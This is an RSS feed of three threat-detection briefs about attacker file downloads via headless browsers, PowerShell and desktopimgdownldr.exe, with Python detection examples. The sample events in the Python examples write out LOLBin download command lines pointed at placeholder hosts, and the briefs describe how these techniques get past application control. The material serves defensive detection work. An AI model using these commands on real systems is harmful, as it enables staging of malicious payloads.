<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>File-Download — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/file-download/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Mon, 06 Apr 2026 15:34:19 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/file-download/feed.xml" rel="self" type="application/rss+xml"/><item><title>Potential File Download via a Headless Browser</title><link>https://feed.craftedsignal.io/briefs/2026-06-headless-browser-download/</link><pubDate>Mon, 06 Apr 2026 15:34:19 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-06-headless-browser-download/</guid><description>Detects the execution of headless browsers from suspicious parent processes with arguments indicative of scripted retrieval, bypassing application control policies and restrictions on direct download tools.</description><content:encoded><![CDATA[<p>This detection identifies potential file downloads via headless browsers on Windows systems. Attackers abuse headless browser capabilities (chrome.exe, msedge.exe, brave.exe, browser.exe, dragon.exe, vivaldi.exe) to download files, proxy traffic, and bypass application control policies. The technique leverages trusted, signed binaries to evade security restrictions, effectively using the browser as a covert download tool. 
The activity is characterized by a headless browser being launched from a suspicious parent process, such as a script host, Office application, or command shell, with arguments that facilitate scripted content retrieval, such as <code>--headless*</code>, <code>--dump-dom</code> (which writes the rendered page to standard output, where the calling script can redirect it to a file), <code>*http*</code>, and <code>data:text/html;base64,*</code>. Defenders should monitor for such anomalous browser behavior to identify and prevent malicious file downloads.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A user unknowingly executes a malicious script or document (e.g., via phishing or drive-by download).</li>
<li>The script (e.g., PowerShell, VBScript) or document macro initiates a process, such as cmd.exe or powershell.exe.</li>
<li>The parent process spawns a headless browser instance (chrome.exe, msedge.exe, etc.) with the <code>--headless</code> argument.</li>
<li>Additional arguments are passed to the headless browser to specify a URL for download or base64 encoded content (<code>--dump-dom *http*</code>, <code>data:text/html;base64,*</code>).</li>
<li>The headless browser retrieves the content from the specified URL or decodes the base64 data.</li>
<li>The retrieved content reaches disk, for example when the calling script redirects the <code>--dump-dom</code> output to a file, typically in a user-writable directory.</li>
<li>The initial script or document executes the downloaded file or uses it for further malicious activities.</li>
<li>The attacker achieves their objective, such as establishing persistence, exfiltrating data, or deploying ransomware.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to arbitrary code execution, data compromise, and system compromise. Attackers can use this technique to download malware, bypass security controls, and establish a foothold in the compromised system. The impact can range from individual workstation compromise to large-scale network infiltration, depending on the attacker&rsquo;s objectives and the privileges of the compromised user.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rules in this brief to your SIEM to detect suspicious headless browser activity, tuning for your environment.</li>
<li>Enable process creation logging and command-line auditing to capture the necessary data for the Sigma rules.</li>
<li>Investigate alerts generated by the Sigma rules, focusing on the parent process, browser arguments, and downloaded file artifacts.</li>
<li>Review and harden endpoint policies: application control allows the signed browser itself, so use EDR or attack surface reduction rules (for example, the rule that blocks Office applications from creating child processes) to restrict browser launches from script hosts, command shells, and Office applications where there is no business need.</li>
<li>Monitor network connections from headless browsers to identify potential command and control traffic or data exfiltration attempts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-and-control</category><category>headless-browser</category><category>file-download</category><category>windows</category></item><item><title>Remote File Download via PowerShell</title><link>https://feed.craftedsignal.io/briefs/2024-01-remote-file-download-powershell/</link><pubDate>Wed, 03 Jan 2024 15:25:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-remote-file-download-powershell/</guid><description>Detects PowerShell being used to download executable files from untrusted remote destinations, a common technique for attackers to introduce tooling or malware into a compromised environment.</description><content:encoded><![CDATA[<p>Attackers frequently use PowerShell, a legitimate administration tool, to download malicious payloads into compromised systems. This technique allows them to bypass traditional security measures by leveraging a trusted tool. This activity often occurs during the command and control phase, where attackers introduce additional tooling or malware for further exploitation. This rule identifies instances where PowerShell downloads executable and script files from untrusted remote destinations. It does this by correlating network and file events, specifically looking for PowerShell processes initiating network connections to non-whitelisted domains followed by the creation of executable or script files. The rule helps defenders identify and respond to potential command and control activity and malware deployment attempts.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to a Windows system, possibly through phishing or exploiting a vulnerability.</li>
<li>The attacker uses PowerShell (powershell.exe, pwsh.exe, or powershell_ise.exe) to initiate a network connection to a remote domain.</li>
<li>The DNS request targets a domain outside the rule's allow list (for example, not <code>*.microsoft.com</code> or <code>*.azureedge.net</code>).</li>
<li>PowerShell downloads a file with an executable extension (e.g., .exe, .dll, .ps1, .bat) or a file that starts with an MZ header, regardless of its extension.</li>
<li>The downloaded file is written to disk.</li>
<li>The rule fires only when the file path is not covered by its exclusions, which filter out commonly used temporary directories.</li>
<li>The downloaded executable or script is then executed, leading to further malicious activities.</li>
<li>The attacker achieves persistence, lateral movement, or data exfiltration depending on the downloaded payload.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack can lead to the introduction of malware, backdoors, or other malicious tools into the compromised system. This can enable attackers to perform a wide range of malicious activities, including data theft, system compromise, and further propagation within the network. The compromised system can become a beachhead for further attacks, potentially impacting numerous systems and leading to significant financial and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>PowerShell Remote File Download</code> to detect PowerShell processes downloading executable files from untrusted remote destinations by correlating network and file creation events.</li>
<li>Enable Elastic Defend to provide the necessary network and file event data for the rule to function correctly as noted in the <a href="https://ela.st/install-elastic-defend">setup instructions</a>.</li>
<li>Investigate any alerts generated by the Sigma rule, focusing on the parent process of the PowerShell process, the reputation of the downloaded file, and any other suspicious activities on the affected host, as per the investigation guide in the rule&rsquo;s <code>note</code> field.</li>
<li>Review and customize the whitelisted domains in the Sigma rule to match your organization&rsquo;s specific environment and trusted external resources, as described in the <code>query</code> field.</li>
<li>Block the identified malicious domains or IP addresses at the network perimeter to prevent further downloads.</li>
</ul>
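<p>The correlation the brief describes, written out as an added example (this is not the brief's or the vendor's own rule code). It joins a PowerShell DNS lookup to a non-allow-listed domain with an executable or script file created by the same process within a short window, applies the MZ-header check and the temporary-directory exclusions, and runs over constructed events. The ECS-style field names, the allow list, the extension set, the path exclusions and the 30-second window are assumptions for illustration, not the production rule's exact values.</p>

```python
"""Added example (not the brief's or Elastic's rule code): correlate PowerShell
DNS lookups with a later executable/script file creation by the same process.
Events are constructed ECS-style dicts; field names, allow list, extension set,
path exclusions and maxspan are assumptions for illustration."""
from datetime import datetime, timedelta
from fnmatch import fnmatch

POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Trusted download sources (tune per environment). Patterns are anchored on the
# right, so "microsoft.com.evil.test" does not slip through.
ALLOWED_DOMAINS = ("*.microsoft.com", "*.azureedge.net", "*.windowsupdate.com")
# Extensions the brief names plus a few more executable types (assumption).
EXEC_EXTENSIONS = {"exe", "dll", "ps1", "bat", "cmd", "vbs", "js", "scr", "msi"}
# Stand-ins for the rule's "commonly used temporary directories" (assumption).
EXCLUDED_PATH_GLOBS = (r"?:\users\*\appdata\local\temp\*", r"?:\windows\temp\*")
MAXSPAN = timedelta(seconds=30)  # how long after the lookup the file may appear


def is_allowed_domain(name: str) -> bool:
    return any(fnmatch(name.lower(), pat) for pat in ALLOWED_DOMAINS)


def is_excluded_path(path: str) -> bool:
    return any(fnmatch(path.lower(), pat) for pat in EXCLUDED_PATH_GLOBS)


def looks_executable(evt: dict) -> bool:
    """Executable by extension, or by a PE 'MZ' header (bytes 4D 5A) whatever the name."""
    ext = evt.get("file.extension", "").lower()
    header = evt.get("file.header_bytes", "").lower()
    return ext in EXEC_EXTENSIONS or header.startswith("4d5a")


def correlate(events: list, maxspan: timedelta = MAXSPAN) -> list:
    """One alert per executable file creation that follows, within maxspan, a DNS
    lookup to a non-allow-listed domain by the same PowerShell process."""
    lookups = {}  # process.entity_id -> [(timestamp, domain), ...]
    alerts = []
    for evt in sorted(events, key=lambda e: e["@timestamp"]):
        if evt.get("process.name", "").lower() not in POWERSHELL:
            continue
        ts = datetime.fromisoformat(evt["@timestamp"])
        pid = evt["process.entity_id"]
        if evt.get("event.category") == "network" and "dns.question.name" in evt:
            domain = evt["dns.question.name"]
            if not is_allowed_domain(domain):
                lookups.setdefault(pid, []).append((ts, domain))
        elif evt.get("event.category") == "file" and evt.get("event.type") == "creation":
            if not looks_executable(evt) or is_excluded_path(evt["file.path"]):
                continue
            recent = [d for t, d in lookups.get(pid, []) if timedelta(0) <= ts - t <= maxspan]
            if recent:
                alerts.append({"process.entity_id": pid, "domain": recent[-1],
                               "file.path": evt["file.path"]})
    return alerts


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    # p1: lookup to an unknown host, then an .exe lands in Downloads -> alert
    {"@timestamp": "2024-01-03T15:25:00", "event.category": "network", "process.name": "powershell.exe",
     "process.entity_id": "p1", "dns.question.name": "cdn.evil-example.test"},
    {"@timestamp": "2024-01-03T15:25:04", "event.category": "file", "event.type": "creation",
     "process.name": "powershell.exe", "process.entity_id": "p1",
     "file.path": r"C:\Users\alice\Downloads\update.exe", "file.extension": "exe"},
    # p2: allow-listed source -> no alert
    {"@timestamp": "2024-01-03T15:26:00", "event.category": "network", "process.name": "pwsh.exe",
     "process.entity_id": "p2", "dns.question.name": "download.microsoft.com"},
    {"@timestamp": "2024-01-03T15:26:02", "event.category": "file", "event.type": "creation",
     "process.name": "pwsh.exe", "process.entity_id": "p2",
     "file.path": r"C:\Users\bob\Downloads\tool.exe", "file.extension": "exe"},
    # p3: harmless-looking extension but a PE header -> alert
    {"@timestamp": "2024-01-03T15:27:00", "event.category": "network", "process.name": "powershell.exe",
     "process.entity_id": "p3", "dns.question.name": "files.example.test"},
    {"@timestamp": "2024-01-03T15:27:10", "event.category": "file", "event.type": "creation",
     "process.name": "powershell.exe", "process.entity_id": "p3",
     "file.path": r"C:\ProgramData\cache\blob.dat", "file.extension": "dat", "file.header_bytes": "4d5a9000"},
    # p4: file appears a minute after the lookup, outside maxspan -> no alert
    {"@timestamp": "2024-01-03T15:28:00", "event.category": "network", "process.name": "powershell.exe",
     "process.entity_id": "p4", "dns.question.name": "slow.example.test"},
    {"@timestamp": "2024-01-03T15:29:00", "event.category": "file", "event.type": "creation",
     "process.name": "powershell.exe", "process.entity_id": "p4",
     "file.path": r"C:\Users\carol\Desktop\a.ps1", "file.extension": "ps1"},
    # p5: written to an excluded temp directory -> no alert
    {"@timestamp": "2024-01-03T15:30:00", "event.category": "network", "process.name": "powershell.exe",
     "process.entity_id": "p5", "dns.question.name": "x.example.test"},
    {"@timestamp": "2024-01-03T15:30:01", "event.category": "file", "event.type": "creation",
     "process.name": "powershell.exe", "process.entity_id": "p5",
     "file.path": r"C:\Users\dave\AppData\Local\Temp\b.dll", "file.extension": "dll"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

<p>Two things worth keeping when porting this to a real query: the allow list must be anchored as a suffix match, otherwise look-alike domains such as <code>microsoft.com.evil.test</code> pass, and the MZ-header check catches payloads staged under an innocuous extension before they are renamed, which an extension-only rule misses.</p>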
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>command-and-control</category><category>file-download</category><category>powershell</category><category>windows</category></item><item><title>Remote File Download via Desktopimgdownldr Utility</title><link>https://feed.craftedsignal.io/briefs/2024-01-desktopimgdownldr-remote-file-copy/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-desktopimgdownldr-remote-file-copy/</guid><description>The desktopimgdownldr utility can be abused to download remote files, potentially bypassing standard download restrictions and acting as an alternative to certutil for malware or tool deployment.</description><content:encoded><![CDATA[<p>The <code>desktopimgdownldr.exe</code> utility, a legitimate Windows tool for configuring lock screen and desktop images, can be misused by adversaries to download arbitrary files from remote locations. This is achieved by leveraging the <code>/lockscreenurl</code> argument followed by an HTTP or HTTPS URL. This technique allows attackers to bypass traditional download restrictions and can be used to retrieve malicious payloads, tools, or scripts directly onto a compromised system. This method is particularly effective because <code>desktopimgdownldr.exe</code> is a signed Microsoft binary, potentially evading initial detection based on process name or file reputation. The detection rule was initially created in September 2020 and updated in May 2026. This technique is valuable for attackers seeking to transfer files without using common tools like <code>certutil</code>, <code>powershell</code>, or <code>bitsadmin</code>.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains initial access to the target system through an existing vulnerability, credential compromise, or social engineering.</li>
<li>The attacker executes <code>desktopimgdownldr.exe</code> with the <code>/lockscreenurl:</code> argument, specifying an HTTP or HTTPS URL from which to download a malicious file.</li>
<li><code>desktopimgdownldr.exe</code> initiates an HTTP or HTTPS request to the specified URL.</li>
<li>The remote server responds with the file content, which <code>desktopimgdownldr.exe</code> saves to disk.</li>
<li>The attacker then executes the downloaded file (e.g., a malicious script or executable).</li>
<li>The malicious code performs actions such as establishing persistence, escalating privileges, or deploying further malware.</li>
<li>The attacker uses the compromised system to move laterally within the network, accessing sensitive data and systems.</li>
<li>The attacker achieves their final objective, such as data exfiltration, ransomware deployment, or disruption of services.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful abuse allows attackers to download and execute arbitrary files on a Windows system, leading to potential compromise of the host and the network. This can result in data theft, system damage, or ransomware infection. Because <code>desktopimgdownldr.exe</code> is a legitimate, signed Microsoft binary, this technique can bypass security controls and detection mechanisms that rely on file reputation alone, increasing the likelihood of success. This is abuse of legitimate functionality rather than a vulnerability: any Windows system on which an attacker can already execute commands is exposed.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Remote File Download via Desktopimgdownldr Utility&rdquo; to your SIEM to detect the execution of <code>desktopimgdownldr.exe</code> with the <code>/lockscreenurl</code> argument.</li>
<li>Monitor process creation events for <code>desktopimgdownldr.exe</code> to identify suspicious command-line arguments.</li>
<li>Enable Sysmon process creation logging to ensure sufficient data is available for the provided Sigma rules.</li>
<li>Investigate any instances of <code>desktopimgdownldr.exe</code> downloading files from external URLs to determine if they are malicious.</li>
<li>Implement application control policies to restrict the execution of unauthorized or unknown executables in sensitive environments.</li>
</ul>
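<p>The two process-creation detections in this feed, the headless browser download above and the <code>desktopimgdownldr.exe</code> rule in this brief, reduce to the same Sigma-style selection logic, so one added example serves both (this is not the brief's or any vendor's rule code). It implements the Sigma semantics that matter here, AND across fields within a selection, OR across a field's value list unless <code>|all</code> is present, case-insensitive matching, and runs both rules over constructed Sysmon Event ID 1 style records. The list of suspicious parent processes is an assumption built from the brief's description (script hosts, shells, Office applications); tune it to your environment.</p>

```python
"""Added example (not the brief's or any vendor's rule code): a minimal evaluator
for Sigma-style process-creation selections, run over constructed Sysmon
Event ID 1 style records, for the headless-browser and desktopimgdownldr
detections. SUSPICIOUS_PARENTS is an assumption; tune it to your environment."""


def _match(value: str, pattern: str, mode: str) -> bool:
    """Case-insensitive Sigma value modifiers (contains/endswith/startswith/equals)."""
    v, p = value.lower(), pattern.lower()
    if mode == "contains":
        return p in v
    if mode == "endswith":
        return v.endswith(p)
    if mode == "startswith":
        return v.startswith(p)
    return v == p


def selection_matches(selection: dict, event: dict) -> bool:
    """Every field in a selection must match (AND); a field's value list matches
    if any value matches (OR), or if all do when the '|all' modifier is present."""
    for spec, patterns in selection.items():
        field, *mods = spec.split("|")
        mode = next((m for m in mods if m != "all"), "equals")
        value = str(event.get(field, ""))
        hits = [_match(value, p, mode) for p in patterns]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True


def rule_matches(rule: list, event: dict) -> bool:
    """A rule here is a list of selections joined by AND (Sigma: 'sel1 and sel2')."""
    return all(selection_matches(sel, event) for sel in rule)


# Assumption: parents the brief calls suspicious (shells, script hosts, Office).
SUSPICIOUS_PARENTS = [r"\cmd.exe", r"\powershell.exe", r"\pwsh.exe", r"\wscript.exe",
                      r"\cscript.exe", r"\mshta.exe", r"\winword.exe", r"\excel.exe",
                      r"\outlook.exe"]

RULES = {
    "Potential File Download via a Headless Browser": [
        {"Image|endswith": [r"\chrome.exe", r"\msedge.exe", r"\brave.exe",
                            r"\browser.exe", r"\dragon.exe", r"\vivaldi.exe"],
         "ParentImage|endswith": SUSPICIOUS_PARENTS,
         "CommandLine|contains": ["--headless"]},
        # plus at least one argument indicating scripted retrieval
        {"CommandLine|contains": ["--dump-dom", "http", "data:text/html;base64,"]},
    ],
    "Remote File Download via Desktopimgdownldr Utility": [
        {"Image|endswith": [r"\desktopimgdownldr.exe"],
         "CommandLine|contains|all": ["/lockscreenurl:", "http"]},
    ],
}


def run(events: list, rules: dict = RULES) -> list:
    """Return (rule title, command line) for every event that matches a rule."""
    return [(title, e["CommandLine"]) for e in events for title, rule in rules.items()
            if rule_matches(rule, e)]


# Constructed sample process-creation records (Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"chrome.exe --headless --dump-dom https://cdn.example.test/stage2.txt"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",  # interactive launch, not headless
     "CommandLine": r'"chrome.exe" --profile-directory=Default https://intranet.example.test'},
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'msedge.exe --headless=new "data:text/html;base64,PGh0bWw+PC9odG1sPg=="'},
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"desktopimgdownldr.exe /lockscreenurl:https://files.example.test/a.exe /eventName:desktopimgdownldr"},
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",  # constructed local-path case, no URL
     "CommandLine": r"desktopimgdownldr.exe /lockscreenurl:C:\Windows\Web\Screen\img100.jpg /eventName:desktopimgdownldr"},
]

if __name__ == "__main__":
    for title, cmd in run(SAMPLE_EVENTS):
        print(f"[{title}] {cmd}")
```

<p>The second record shows why the parent-process clause matters: an interactively launched browser with a URL on its command line is routine and must not fire, while the same binary spawned by <code>cmd.exe</code> with <code>--headless --dump-dom</code> is the pattern the brief describes. The <code>*http*</code> term is deliberately broad and will need environment-specific tuning once the parent and <code>--headless</code> constraints are in place.</p>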
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>command-and-control</category><category>file-download</category><category>windows</category><category>desktopimgdownldr</category></item></channel></rss>